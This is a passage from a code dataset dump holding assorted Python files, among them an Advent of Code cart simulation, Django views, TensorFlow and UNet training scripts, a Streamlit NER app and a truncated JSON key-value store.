x)\n if x == -1:\n break\n finder = y, x, direction\n x += 1\n if not finder:\n return 0\n return tuple(finder)\n\n\nclass ObjectBuilder:\n \"\"\"\n Builder to instanciate objects from the input_test\n \"\"\"\n def __init__(self, lines):\n self.carts = []\n self.lines = lines\n self.map = self.build_map()\n self.carts = self.build_carts()\n\n def print_carts(self):\n # print the map using the matrix map\n print(self.carts)\n\n def build_carts(self):\n # return a list of carts as (x, y, direction of cart)\n carts = []\n carts_object = []\n y = 0\n for line in self.lines:\n right_direction = find_all_direction(line, y, \">\")\n if right_direction != 0:\n carts.append(find_all_direction(line, y, \">\"))\n left_direction = find_all_direction(line, y, \"<\")\n if left_direction != 0:\n carts.append(find_all_direction(line, y, \"<\"))\n up_direction = find_all_direction(line, y, \"^\")\n if up_direction != 0:\n carts.append(find_all_direction(line, y, \"^\"))\n down_direction = find_all_direction(line, y, \"v\")\n if down_direction != 0:\n carts.append(find_all_direction(line, y, \"v\"))\n y += 1\n carts = sorted(carts)\n # browse on list of tuple\n for cart in carts:\n # create each cart object\n carts_object.append(Cart(cart[0], cart[1], cart[2], self.map))\n # remove the carts from the map\n self.remove_carts_from_map(carts_object)\n return carts_object\n\n def remove_carts_from_map(self, carts_object):\n for cart in carts_object:\n self.map[cart.get_position_yx()[0]][cart.get_position_yx()[1]] = \" \"\n\n def build_map(self):\n # return the matrix of the map\n map = []\n for line in self.lines:\n line_list = []\n for i in line:\n line_list.append(i)\n map.append(line_list)\n return map\n\n def get_carts(self):\n \"\"\"\n Give us the carts on a list\n :return: carts[]\n \"\"\"\n return self.carts\n\n def get_map(self):\n \"\"\"\n Give us the map on a matrix\n :return: map[][]\n \"\"\"\n return self.map\n\n\nclass MineCartMadnessManager:\n \"\"\"\n A mine cart madness manager allow us to move carts on the map and find the collision\n \"\"\"\n def __init__(self, carts, map):\n \"\"\"\n\n :param carts: list of carts\n :param map: matrix of map containing turns and intersections\n\n :param collision_position: coordonate of the first collision\n :param last_position: coordonate of the last position of cart\n\n :param collision: True if there was a collision\n :param is_last_cart: True if there was only one cart alive\n \"\"\"\n self.carts = carts\n self.map = map\n self.collision_position = (0, 0)\n self.last_position = (0, 0)\n self.collision = False\n self.is_last_cart = False\n\n def is_collision(self):\n \"\"\"\n Determine if there was a collision between two carts\n :return: True if there was a collision\n \"\"\"\n return self.collision\n\n def there_was_a_collision(self):\n \"\"\"\n The collision between two carts happened\n \"\"\"\n self.collision = True\n\n def the_last_cart_position(self, cart):\n \"\"\"\n The collision between two carts happened\n \"\"\"\n self.last_position = cart.get_position_yx\n\n def get_next_position_cart(self, cart):\n \"\"\"\n Get the next position of the current cart\n :param cart: the cart we want to evaluate\n :return: the next position of the cart\n \"\"\"\n next_position = 0\n curr_direction = cart.get_direction()\n curr_position = cart.get_position_yx()\n if curr_direction == \">\":\n next_position = curr_position[0], curr_position[1] + 1\n elif curr_direction == \"^\":\n next_position = curr_position[0] - 1, curr_position[1]\n elif curr_direction == \"<\":\n next_position = curr_position[0], curr_position[1] - 1\n elif curr_direction == \"v\":\n next_position = curr_position[0] + 1, curr_position[1]\n return next_position\n\n def are_they_on_collision(self, cart):\n \"\"\"\n We know if it will be a collision between the current cart and an other\n :param cart: the current cart\n :return: True if there was a cart with the current cart position\n \"\"\"\n # get the next position of current cart\n #next_position = self.get_next_position_cart(cart)\n current_position = cart.get_position_yx()\n two_cars = 0\n # browse in carts\n for cart in self.carts:\n # if there was a cart here return True\n if current_position == cart.get_position_yx():\n two_cars += 1\n if two_cars == 2:\n self.collision_position = current_position\n return True\n return False\n\n def sort_carts(self):\n \"\"\"\n update the carts order by horizontally then vertically\n \"\"\"\n carts_to_sorted = []\n for cart in self.carts:\n carts_to_sorted.append(tuple((cart.get_position_yx()[0], cart.get_position_yx()[1], cart.get_direction(), cart.get_per_intersection_memory())))\n carts_to_sorted = sorted(carts_to_sorted)\n self.carts = []\n # browse on list of tuple\n for cart in carts_to_sorted:\n # create each cart object\n self.carts.append(Cart(cart[0], cart[1], cart[2], self.map, cart[3]))\n\n def remove_carts_on_collision(self, cart):\n \"\"\"\n Remove the two carts on collision from the list of carts\n :param cart: the cart to test for the collision\n \"\"\"\n #next_position = self.get_next_position_cart(cart)\n current_position = cart.get_position_yx()\n two_cars = 0\n # browse in carts\n for cart in self.carts:\n # if there was a cart here return True\n if current_position == cart.get_position_yx():\n two_cars += 1\n # use the position to the collision to remove carts\n if two_cars == 2:\n carts_alive = []\n for cart in self.carts:\n if cart.get_position_yx() != current_position:\n carts_alive.append(cart)\n self.carts = carts_alive\n\n def run(self):\n # launch the execution of cart on the map only if there was no collision\n while not self.is_last_cart:\n # browse in each carts\n # refresh order\n # sort carts\n self.sort_carts()\n for cart in self.carts:\n cart.move()\n # determine if it will be a collision between the current cart and another\n if self.are_they_on_collision(cart):\n # set the final parameter and leave the loop\n self.there_was_a_collision()\n # remove all carts on collision\n self.remove_carts_on_collision(cart)\n # get the last position\n if len(self.carts) == 1:\n self.last_position = self.carts[0].get_position_yx()\n self.is_last_cart = True\n break\n\n def print_map_with_carts(self, pos_x=(-1, -1)):\n from copy import deepcopy\n map_with_carts = deepcopy(self.map)\n\n for cart in self.carts:\n y, x = cart.get_position_yx()\n map_with_carts[y][x] = cart.get_direction()\n y, x = pos_x\n if y != -1:\n map_with_carts[y][x] = \"X\"\n string_map = \"\"\n for line in map_with_carts:\n string_map += \"\".join(line) + \"\\n\"\n print(string_map)\n\n def visualize(self):\n return self.last_position[1], self.last_position[0]\n\n def print_map(self):\n # print the map using the matrix map\n for index, values in enumerate(self.map):\n print(index, \"\\t\\t\\t\", values)\n\n\ndef data_retrieve(lines):\n # return the new lines traited\n # count nb cart\n return lines\n\n\ndef data_preparation(lines):\n # return the value of input_test\n return lines\n\n\ndef day_13_part_2(lines):\n # data retrieve\n lines = data_retrieve(lines)\n # data preparation\n object_builder = ObjectBuilder(lines)\n # data modelisation\n mine_cart_madness = MineCartMadnessManager(object_builder.get_carts(), object_builder.get_map())\n # data analyse\n mine_cart_madness.run()\n # data visualize\n last_postion = mine_cart_madness.visualize()\n return str(last_postion[0]) + \",\" + str(last_postion[1])\n\n\nclass TestDay13part2(unittest.TestCase):\n\n def test_day_13_part_2(self):\n lines = input_file()\n res = output_file()\n pred = day_13_part_2(lines)\n assert(pred == res)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"2018/Day 13/Part two/TestDay13part2.py","file_name":"TestDay13part2.py","file_ext":"py","file_size_in_byte":13938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"71242204","text":"from django.contrib import admin\nfrom .models import Project, Event\n\nclass ProjectAdmin(admin.ModelAdmin):\n\tlist_display = [\"name\", \"api_key\", \"api_secret\"]\n\tclass Meta:\n\t\tmodel = Project\n\nclass EventAdmin(admin.ModelAdmin):\n\tlist_display = [\"name\", \"timestamp\", \"token\"]\n\tclass Meta:\n\t\tmodel = Event\n\nadmin.site.register(Project, ProjectAdmin)\nadmin.site.register(Event, EventAdmin)\n# Register your models here.\nfrom django.contrib import admin\n\n# Register your models here.\n","sub_path":"rickypanel/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263708357","text":"#!/usr/bin/env python3\n# Copyright (c) 2017 Angel Terrones \n\nimport os\nimport argparse\n\n\nclass Coregen:\n _build_path = './build'\n\n def __init__(self, board):\n parser = argparse.ArgumentParser(description='Core generation.')\n subparser = parser.add_subparsers(title='Sub-commands', description='Available functions',\n help='Description')\n # convert\n p2v = subparser.add_parser('toverilog', help='Translate design to Verilog')\n p2v.set_defaults(func=self.convert_to_verilog)\n # build\n build = subparser.add_parser('build', help='Build bitstream using vendor tools')\n build.set_defaults(func=self.build_project)\n # program\n prog = subparser.add_parser('program', help='Program platform')\n prog.add_argument('--flash', help='Download bitfile to ISF', action='store_true')\n prog.set_defaults(func=self.program)\n\n self.parser = parser\n self.board = board\n\n def run(self):\n args = self.parser.parse_args()\n args.func(args)\n\n def convert_to_verilog(self, args):\n os.makedirs(self._build_path, exist_ok=True)\n self.board.convert(path=self._build_path, trace=False, testbench=False)\n\n def build_project(self, args):\n os.makedirs(self._build_path, exist_ok=True)\n self.board.build(build_path=self._build_path)\n\n def program(self, args):\n prog = self.board.get_programmer()\n bitfile = '{}/{}.bit'.format(self._build_path, self.board.name)\n if args.flash:\n prog.flash(bitfile)\n else:\n prog.load_bitstream(bitfile)\n\n# Local Variables:\n# flycheck-flake8-maximum-line-length: 200\n# flycheck-flake8rc: \".flake8rc\"\n# End:\n","sub_path":"coregen/coregen.py","file_name":"coregen.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"644216722","text":"#! /usr/bin/env python\n# ______________________________________________________________________\n\nfrom numba.translate import _plat_bits\nfrom numba.decorators import autojit\n\nimport numpy as np\nimport numpy\n\nimport unittest\n\n# ______________________________________________________________________\n\n@autojit(backend='ast')\ndef get_ndarray_ndim(ndarr):\n return ndarr.ndim\n\n@autojit(backend='ast')\ndef get_ndarray_shape(ndarr):\n return ndarr.shape\n\n@autojit(backend='ast')\ndef get_ndarray_data(ndarr):\n return ndarr.data\n\n@autojit(backend='ast')\ndef get_ndarray_2_shape_unpack_0(ndarr):\n dim0, _ = ndarr.shape\n return dim0\n\n@autojit(backend='ast')\ndef get_ndarray_2_shape_unpack_1(ndarr):\n _, dim1 = ndarr.shape\n return dim1\n\n# ______________________________________________________________________\n\nclass TestGetattr(unittest.TestCase):\n def test_getattr_ndim(self):\n result = get_ndarray_ndim(np.empty((2,)))\n self.assertEqual(result, 1)\n result = get_ndarray_ndim(np.empty((2, 2)))\n self.assertEqual(result, 2)\n\n def test_getattr_shape(self):\n a = np.empty((10,))\n result = get_ndarray_shape(a)\n self.assertEqual(result[0], 10)\n\n a = np.empty((10, 20))\n result = get_ndarray_shape(a)\n self.assertEqual(result[0], 10)\n self.assertEqual(result[1], 20)\n\n def test_getattr_shape_unpack(self):\n array = np.empty((1, 2))\n dim0 = get_ndarray_2_shape_unpack_0(array)\n dim1 = get_ndarray_2_shape_unpack_1(array)\n self.assertEqual((dim0, dim1), (1, 2))\n\n def test_getattr_data_1(self):\n test_data = numpy.array([1., 2., 3.])\n data_pointer = get_ndarray_data(test_data)\n self.assertEqual(data_pointer[0], 1.)\n self.assertEqual(data_pointer[1], 2.)\n self.assertEqual(data_pointer[2], 3.)\n\n def test_getattr_data_2(self):\n test_data = numpy.array([[1., 2., 3.], [4., 5., 6.]])\n result = get_ndarray_data(test_data)\n self.assertEqual(result[0], 1.)\n self.assertEqual(result[1], 2.)\n self.assertEqual(result[2], 3.)\n self.assertEqual(result[3], 4.)\n self.assertEqual(result[4], 5.)\n self.assertEqual(result[5], 6.)\n\n# ______________________________________________________________________\n\nif __name__ == \"__main__\":\n# TestGetattr('test_getattr_shape').debug()\n unittest.main()\n\n# ______________________________________________________________________\n# End of test_ast_getattr.py\n","sub_path":"numba/tests/test_ast_getattr.py","file_name":"test_ast_getattr.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"239296046","text":"import tensorflow as tf\nimport numpy as np\n\nimport input_data\n\nbatch_size = 128\ntest_size = 256\n\ndef init_weights(shape,name):\n return tf.Variable(tf.random_normal(shape, stddev=0.01),name)\n\n\ndef model(X, w, w2, w3, w4, w_o, p_keep_conv, p_keep_hidden):\n l1a = tf.nn.relu(tf.nn.conv2d(X, w, # l1a shape=(?, 28, 28, 32)\n strides=[1, 1, 1, 1], padding='SAME'))\n l1 = tf.nn.max_pool(l1a, ksize=[1, 2, 2, 1], # l1 shape=(?, 14, 14, 32)\n strides=[1, 2, 2, 1], padding='SAME')\n l1 = tf.nn.dropout(l1, p_keep_conv)\n\n l2a = tf.nn.relu(tf.nn.conv2d(l1, w2, # l2a shape=(?, 14, 14, 64)\n strides=[1, 1, 1, 1], padding='SAME'))\n l2 = tf.nn.max_pool(l2a, ksize=[1, 2, 2, 1], # l2 shape=(?, 7, 7, 64)\n strides=[1, 2, 2, 1], padding='SAME')\n l2 = tf.nn.dropout(l2, p_keep_conv)\n\n l3a = tf.nn.relu(tf.nn.conv2d(l2, w3, # l3a shape=(?, 7, 7, 128)\n strides=[1, 1, 1, 1], padding='SAME'))\n l3 = tf.nn.max_pool(l3a, ksize=[1, 2, 2, 1], # l3 shape=(?, 4, 4, 128)\n strides=[1, 2, 2, 1], padding='SAME')\n l3 = tf.reshape(l3, [-1, w4.get_shape().as_list()[0]]) # reshape to (?, 2048)\n l3 = tf.nn.dropout(l3, p_keep_conv)\n\n l4 = tf.nn.relu(tf.matmul(l3, w4))\n l4 = tf.nn.dropout(l4, p_keep_hidden)\n\n pyx = tf.matmul(l4, w_o)\n #print(\"model:\",pyx)\n return pyx\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\ntrX, trY, teX, teY = mnist.train.images, mnist.train.labels, mnist.test.images, mnist.test.labels\ntrX = trX.reshape(-1, 28, 28, 1) # 28x28x1 input img\nteX = teX.reshape(-1, 28, 28, 1) # 28x28x1 input img\n\nX = tf.placeholder(\"float\", [None, 28, 28, 1], name='x-input')\nY = tf.placeholder(\"float\", [None, 10], name='y-input')\n\nw2 = init_weights([3, 3, 32, 64],\"w2\") # 3x3x32 conv, 64 outputs\nw = init_weights([3, 3, 1, 32],\"w\") # 3x3x1 conv, 32 outputs\nw3 = init_weights([3, 3, 64, 128],\"w3\") # 3x3x32 conv, 128 outputs\nw4 = init_weights([128 * 4 * 4, 625],\"w4\") # 128 filters * 4*4 image\nw_o = init_weights([625, 10],\"w_o\") # FC 625 inputs, 10 outputs (labels)\n\np_keep_conv = tf.placeholder(\"float\", None,\"p_keep_conv\")\np_keep_hidden = tf.placeholder(\"float\", None,\"p_keep_hidden\")\npy_x = model(X, w, w2, w3, w4, w_o, p_keep_conv, p_keep_hidden)\n\nwith tf.name_scope('cost') as scope:\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(py_x, Y))\n cost_summ = tf.scalar_summary(\"cost\", cost)\nwith tf.name_scope('train') as scope:\n train_op = tf.train.RMSPropOptimizer(0.001, 0.9).minimize(cost)\n\npredict_op = tf.argmax(py_x, 1)\n\nw_o_hist = tf.histogram_summary(\"w_o\", w_o)\ny_hist = tf.histogram_summary(\"y-input\", Y)\np_keep_conv_hist = tf.histogram_summary(\"p_keep_conv\", p_keep_conv)\np_keep_hidden_hist = tf.histogram_summary(\"p_keep_hidden\", p_keep_hidden)\n\n\n# Launch the graph in a session\nwith tf.Session() as sess:\n\n tf.initialize_all_variables().run()\n merged = tf.merge_all_summaries()\n writer = tf.train.SummaryWriter(\"./logs/xor_logs\", sess.graph)\n iii=0\n for i in range(3):\n training_batch = zip(range(0, len(trX), batch_size),\n range(batch_size, len(trX), batch_size))\n\n for start, end in training_batch:\n sess.run(train_op, feed_dict={X: trX[start:end], Y: trY[start:end],\n p_keep_conv: 0.8, p_keep_hidden: 0.5})\n if iii % 100 == 0:\n summary = sess.run(merged, feed_dict={X: trX[start:end], Y: trY[start:end],\n p_keep_conv: 0.8, p_keep_hidden: 0.5})\n writer.add_summary(summary, iii/100)\n #print sess.run(cost, feed_dict={X: trX[start:end], Y: trY[start:end],\n # p_keep_conv: 0.8, p_keep_hidden: 0.5})\n iii+=1\n test_indices = np.arange(len(teX)) # Get A Test Batch\n np.random.shuffle(test_indices)\n test_indices = test_indices[0:test_size]\n\n print(i, np.mean(np.argmax(teY[test_indices], axis=1) ==\n sess.run(predict_op, feed_dict={X: teX[test_indices],\n Y: teY[test_indices],\n p_keep_conv: 1.0,\n p_keep_hidden: 1.0})))\n \nprint(\"tensorboard --logdir=/root/test4/Study_TensorFlow/08\\ -\\ CNN --port 6006\")\n","sub_path":"08 - CNN/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"424551694","text":"#! /usr/bin/python\n\nimport numpy as np\n\nimport matplotlib\nmatplotlib.use(\"Agg\")\n\nimport matplotlib.pyplot as plt\n\nxmin, xmax = -np.pi, np.pi\n\nx = np.arange(xmin, xmax, 0.1)\ny_sin = np.sin(x)\ny_cos = np.cos(x)\n\n# sin plot\nplt.subplot(2, 1, 1)\nplt.plot(x, y_sin)\nplt.title(\"$\\sin x$\")\nplt.xlim(xmin, xmax)\nplt.ylim(-1.3, 1.3)\n\n# cos plot\nplt.subplot(2, 1, 2)\nplt.plot(x, y_cos)\nplt.title(\"$\\cos x$\")\nplt.xlim(xmin, xmax)\nplt.ylim(-1.3, 1.3)\n\n# Avoid to duplicate graphtitle\nplt.tight_layout()\n\nplt.show()\n\nplt.savefig(\"/Users/iwaitoshiya/Desktop/graph.png\")\n","sub_path":"gomi11.py","file_name":"gomi11.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"46553155","text":"import time\nfrom riga_dataset import RIGADataset, CropFundus, Rescale, ToTensor\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport torchvision.transforms as transforms\nfrom torch.utils.data import DataLoader\nfrom unet import UNet\n\n\nRIGA_TRAIN_BASE_PATH = r'./RIGA/train/'\nRIGA_TRAIN_CSV_FILE = r'./RIGA/train/images.csv'\n\nRIGA_TEST_BASE_PATH = r'./RIGA/test/'\nRIGA_TEST_CSV_FILE = r'./RIGA/test/images.csv'\n\nTRAIN_MODEL_PATH = './RIGA_model.pth'\n\n# Parameters\nEPOCHS = 1\nBATCH_SIZE = 4\nTRAIN = False\nN_CLASSES = 2\nLEARNING_RATE = 0.001\nMOMENTUM = 0.9\n\n\ndef print_step_images(input, label, output, predicted=None):\n\n fig = plt.figure()\n plt.tight_layout()\n columns = 4 if predicted is None else 5\n\n cols = ['Raw', 'Mask', 'Class 1', 'Class 2'] if predicted is None else\\\n ['Raw', 'Mask', 'Class 1', 'Class 2', 'Predicted']\n plt.suptitle(cols)\n\n for bs in range(BATCH_SIZE):\n a = input[bs].numpy().transpose(1, 2, 0)\n b = label[bs].numpy()\n c1 = output[bs][0].detach().numpy()\n c2 = output[bs][1].detach().numpy()\n\n fig.add_subplot(BATCH_SIZE, columns,(bs * columns) + 1)\n plt.imshow(a)\n\n fig.add_subplot(BATCH_SIZE, columns, (bs * columns) + 2)\n plt.imshow(b, cmap='gray')\n\n fig.add_subplot(BATCH_SIZE, columns, (bs * columns) + 3)\n plt.imshow(c1, cmap='gray')\n\n fig.add_subplot(BATCH_SIZE, columns, (bs * columns) + 4)\n plt.imshow(c2, cmap='gray')\n\n if predicted is not None:\n d = predicted[bs].detach().numpy()\n fig.add_subplot(BATCH_SIZE, columns, (bs * columns) + 5)\n plt.imshow(d, cmap='gray')\n\n plt.show()\n\n\ndef main():\n transform = transforms.Compose([CropFundus(450, 50),\n Rescale(64),\n ToTensor(),\n ])\n # Load train set\n train_set = RIGADataset(csv_file=RIGA_TRAIN_CSV_FILE, root_dir=RIGA_TRAIN_BASE_PATH, transform=transform)\n train_loader = DataLoader(train_set, batch_size=BATCH_SIZE)\n\n test_set = RIGADataset(csv_file=RIGA_TEST_CSV_FILE, root_dir=RIGA_TEST_BASE_PATH, transform=transform)\n test_loader = DataLoader(test_set, batch_size=BATCH_SIZE)\n\n model = UNet(n_class=N_CLASSES)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model.parameters(), lr=LEARNING_RATE, momentum=MOMENTUM)\n\n if TRAIN:\n t0 = time.time()\n for epoch in range(EPOCHS):\n\n running_loss = 0.0\n for i, data in enumerate(train_loader, 0):\n inputs, labels = data['raw'], data['mask']\n\n optimizer.zero_grad()\n outputs = model(inputs)\n\n loss = criterion(outputs, labels)\n loss.backward()\n\n optimizer.step()\n running_loss += loss.item()\n\n print('[%d, %3d] loss: %.3f' % (epoch, i + 1, running_loss))\n running_loss = 0.0\n\n if i == 10: print_step_images(inputs, labels, outputs)\n\n print('Finished Training: Elapsed time: %.3f secs' % (time.time() - t0))\n torch.save(model.state_dict(), TRAIN_MODEL_PATH)\n\n else:\n # Load the trained model\n model.load_state_dict(torch.load(TRAIN_MODEL_PATH))\n\n correct = 0\n total = 0\n index = 0\n with torch.no_grad():\n for data in test_loader:\n print('[%d] ' % index)\n inputs, labels = data['raw'], data['mask']\n # Test on test data\n outputs = model(inputs)\n\n _, predicted = torch.max(outputs.data, 1)\n\n total += labels.size(0)\n correct += (predicted == labels).sum().item()\n index += 1\n\n print('Accuracy of the network on the 10000 test images: %d %%' % (100 * correct / total))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"run_unet.py","file_name":"run_unet.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"269885558","text":"from django.template.defaultfilters import slugify\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import Http404\nfrom collection.models import Thing\nfrom collection.forms import ThingForm\n\n# Create your views here.\n\ndef index(request):\n\t# the rewritten views\n\tthings = Thing.objects.all()\n\t# just getting one object!\n\t# correct_thing = Thing.objects.get(name=\"Hello\")\n\tcontext = {\n\t\t\t\"things\": things,\n\t}\n\n\treturn render(request, 'index.html', context)\n\n\n\ndef thing_detail(request, slug):\n\t# grab the objec\n\tthing = Thing.objects.get(slug=slug)\n\tcontext = {\"thing\": thing}\n\t# and pass to the template\n\treturn render(request, 'things/thing_detail.html', context)\n\n\n@login_required\ndef edit_thing(request, slug):\n\t# grab the object\n\tthing = Thing.objects.get(slug=slug)\n\t# make sure the logged in user is the owner of the thing\n\tif thing.user != request.user:\n\t\traise Http404\n\t# set the form we're using\n\tform_class = ThingForm\n\t# if we're coming to this view from a submitted form\n\tif request.method == \"POST\":\n\t\t# grab the data from the submitted form and apply to\n\t\t# the form\n\t\tform = form_class(data=instance.POST, instance=thing)\n\t\tif form.is_valid():\n\t\t\t# save the new data\n\t\t\tform.save()\n\t\t\treturn redirect('thing.detail', slug=thing.slug)\n\t\t# otherwise just create the form\n\telse:\n\t\tform = form_class(instance=thing)\n\n\t# and render the template\n\treturn render(request, 'things/edit_thing.html', {\"thing\": thing, \"form\": form})\n\n\n\n\ndef create_thing(request):\n\tuser = request.user\n\tform_class = ThingForm\n\t# if we're comng from a submitted form, do this\n\tif request.method == \"POST\":\n\t\t# grab the data from the submitted form and \n\t\t# apply to the form\n\t\tform = form_class(request.POST)\n\t\tif form.is_valid():\n\t\t\tname = form.cleaned_data['name']\n\t\t\tdescription = form.cleaned_data['description']\n\t\t\t# create the slug from our name\n\t\t\tslug = slugify(name)\n\n\t\t\t# create out object\n\t\t\tthing = Thing.objects.create(\n\t\t\t\tname=name,\n\t\t\t\tdescription=description,\n\t\t\t\tslug=slug,\n\t\t\t\tuser=user,\n\t\t\t)\n\n\t\t\t# redirect to our newly created thing\n\t\t\treturn redirect('thing_detail', slug=thing.slug)\n\n\t\t\t# otherwise just create the form\n\telse:\n\t\tform = form_class()\n\n\treturn render(request, 'things/create_thing.html', {\"form\": form,})\n\n\n\n\ndef browse_by_name(request, initial= None):\n\tif initial:\n\t\tthings = Thing.objects.filter(name__istartswith=initial).order_by('name')\n\telse:\n\t\tthings = Thing.objects.all().order_by('name')\n\treturn render(request, 'search/search.html', {\"things\": things,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"initial\": initial})\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"collection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"600502435","text":"#! /usr/bin/python3\nfrom os.path import exists\nfrom sys import exit\nfrom os import system\nfrom runcmd3 import runcmd, waitall\n\nnumnoise = 50\nbeta_end = 8\nbeta_start = 0\ngamma_end = 10\ngamma_start = 0\ngamma_val = [0,0.001,0.002,0.004,0.008,0.016,0.032,0.064,0.128, 0.256, 0.512]\nbeta_val = [0,0.0001,0.0002,0.0004,0.0008,0.0016,0.0032,0.0064,0.0128]\n#beta_val = [2.56, 5.12, 10.24, 20.48, 40.96, 81.92, 163.84, 327.68, 655.36]\nfor beta_i in range(beta_start, beta_end + 1):\n for gamma_i in range(gamma_start, gamma_end + 1):\n for n in range(1, numnoise + 1):\n beta = beta_val[beta_i];\n gamma= gamma_val[gamma_i];\n python_cmd = \"eval_seg_3D_cluster_v1.py %1.4f %1.3f %d\" % (beta, gamma, n)\n log_filename = 'log_files/run_eval_seg_%1.4f_%1.3f_%d.log' % (beta, gamma, n)\n cmd = \"python3 %s >& %s\" % (python_cmd, log_filename)\n print(cmd)\n #exit(1)\n runcmd(cmd, waittime = 5, maxruns = 40)\nwaitall(waittime=1)\n","sub_path":"eval_seg_py_FCM/run_seg_eval_3D.py","file_name":"run_seg_eval_3D.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"332612678","text":"#importing packages\r\nimport streamlit as st\r\nimport wikipedia as wiki\r\nimport spacy \r\nfrom spacy import displacy\r\n\r\n#creating object to perform NLP\r\nner_Obj = spacy.load(\"en_core_web_sm\")\r\n\r\n\r\ndef app():\r\n st.title(\"Named Entity Recognition on Wikipedia pages\")\r\n searchtitle = st.text_input(\" Enter the topic you want to search on wikipedia\")\r\n if st.button(\"Analyze\"):\r\n #collecting datafrom wikipedia\r\n datasearch = wiki.page(searchtitle).content\r\n \r\n #performing NER on data\r\n data = ner_Obj(datasearch)\r\n \r\n #Storing the final output (i.e, data along with NER tags with HTML and css for beautification\r\n html = displacy.render(data,style='ent')\r\n \r\n #displaying the results on the app\r\n st.markdown(html,unsafe_allow_html=True)\r\n\r\n \r\n#main function\r\nif __name__==\"__main__\":\r\n app()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"583110077","text":"import json\r\nimport os\r\nimport sys\r\nimport time\r\nimport threading\r\nclass datastore:\r\n\r\n def __init__(self, filepath=os.getcwd()):\r\n\r\n self.file_path = filepath + '/key_value.json'\r\n self.file_lock = threading.Lock()\r\n self.data_lock = threading.Lock()\r\n\r\n try:\r\n file = open(self.file_path, 'r')\r\n filedata = json.load(file)\r\n self.data = filedata\r\n file.close()\r\n\r\n if not self.file_size_check():\r\n raise Exception('Size of the data store exceeded 1 GB.')\r\n\r\n print('file is created in this location' + self.file_path)\r\n except:\r\n\r\n file = open(self.file_path, 'w')\r\n self.data = {}\r\n self.ttldict = {}\r\n file.close()\r\n print('file is created in this location ' + self.file_path)\r\n\r\n#Method file_size_check that checks the size of file.Returns wheather the file is greater than 1GB or not.\r\n def file_size_check(self):\r\n self.file_lock.acquire()\r\n if os.path.getsize(self.file_path) <= 1e+9:\r\n self.file_lock.release()\r\n return True\r\n else:\r\n self.file_lock.release()\r\n return False\r\n#Method key_check that checks wheather given constrain are matched for the key.\r\n def key_check(self, key):\r\n if type(key) == type(\"\"):\r\n if len(key) > 32:\r\n raise Exception('Key size is capped at 32char. The given key length is ' + str(len(key)))\r\n else:\r\n return True\r\n else:\r\n raise Exception('Key value is not a string. The give type is: ' + str(type(key)))\r\n\r\n# Method create that adds a new key-value pair to the data store\r\n def create(self, key='', value='', ttl=None):\r\n self.key_check(key)\r\n\r\n if key == '':\r\n raise Exception('No key was provided.')\r\n\r\n if value == '':\r\n value = None\r\n\r\n if sys.getsizeof(value) > 16384:\r\n raise Exception(\"value exceeded 16KB size limit.\")\r\n\r\n if not self.file_size_check():\r\n raise Exception('Size of the data store exceeds 1 GB.')\r\n self.data_lock.acquire()\r\n\r\n if key in self.data.keys():\r\n self.data_lock.release()\r\n raise Exception('Key is already present.')\r\n\r\n if ttl is not None:\r\n ttl = int(time.time()) + abs(int(ttl))\r\n\r\n tempdict = {'value': value, 'ttl': ttl}\r\n self.data[key] = tempdict\r\n self.file_lock.acquire()\r\n json.dump(self.data, fp=open(self.file_path, 'w'), indent=2)\r\n self.file_lock.release()\r\n self.data_lock.release()\r\n print('Key added to the file')\r\n\r\n# Method read that allows to retrive value by providing a key\r\n def read(self, key=''):\r\n\r\n self.key_check(key)\r\n if key == '':\r\n raise Exception('Expecting a key to be read.')\r\n\r\n self.data_lock.acquire()\r\n\r\n if key in self.data.keys():\r\n pass\r\n else:\r\n self.data_lock.release()\r\n raise Exception('Key not found in database')\r\n\r\n ttl = self.data[key]['ttl']\r\n\r\n if not ttl:\r\n ttl = 0\r\n\r\n if (time.time() < ttl) or (ttl == 0):\r\n self.data_lock.release()\r\n return json.dumps(self.data[key]['value'])\r\n else:\r\n self.data_lock.release()\r\n raise Exception(\"Key's TTL has expired.\")\r\n\r\n# Method delete that deletes key-value pair by providing a key\r\n def delete(self, key=''):\r\n self.key_check(key)\r\n\r\n if key == '':\r\n raise Exception('Expecting a key to be read.')\r\n\r\n self.data_lock.acquire()\r\n\r\n if key in self.data.keys():\r\n pass\r\n else:\r\n self.data_lock.release()\r\n raise Exception('Key not found in database.')\r\n\r\n ttl = self.data[key]['ttl']\r\n\r\n if not ttl:\r\n ttl = 0\r\n#This snippet checks for ttl is expired or not.\r\n if time.time() < ttl or 